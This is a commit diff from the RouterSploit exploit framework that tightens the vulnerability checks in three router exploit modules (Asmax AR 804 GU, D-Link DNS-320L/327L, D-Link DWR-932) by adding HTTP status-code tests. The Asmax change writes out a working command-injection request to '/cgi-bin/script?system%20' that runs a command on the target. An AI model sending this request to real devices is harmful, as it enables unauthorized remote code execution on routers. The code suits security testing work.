Fixing false positives - status code.

63598d85 · Marcin Bury · 52e0afee · 63598d85 · 63598d85 · 63598d85
Commit 63598d85 authored Apr 25, 2016 by Marcin Bury
3 changed files
--- a/routersploit/modules/exploits/asmax/ar_804_gu_rce.py
+++ b/routersploit/modules/exploits/asmax/ar_804_gu_rce.py
@@ -64,10 +64,13 @@ class Exploit(exploits.Exploit):
    def check(self):
        mark = random_text(32)
        cmd = "echo {}".format(mark)
+        url = sanitize_url("{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd))

-        response = self.execute(cmd)
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable

-        if mark in response:
-            return True
+        if response.status_code == 200 and mark in response.text:
+            return True  # target is vulnerable

-        return False
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
+++ b/routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
@@ -80,7 +80,7 @@ class Exploit(exploits.Exploit):
        if response is None:
            return False  # target is not vulnerable

-        if mark in response.text:
+        if response.status_code == 200 and mark in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
+++ b/routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
@@ -68,7 +68,7 @@ class Exploit(exploits.Exploit):
        if response is None:
            return False  # target is not vulnerable

-        if 'wifi_AP1_ssid' in response.text:
+        if response.status_code == 200 and 'wifi_AP1_ssid' in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable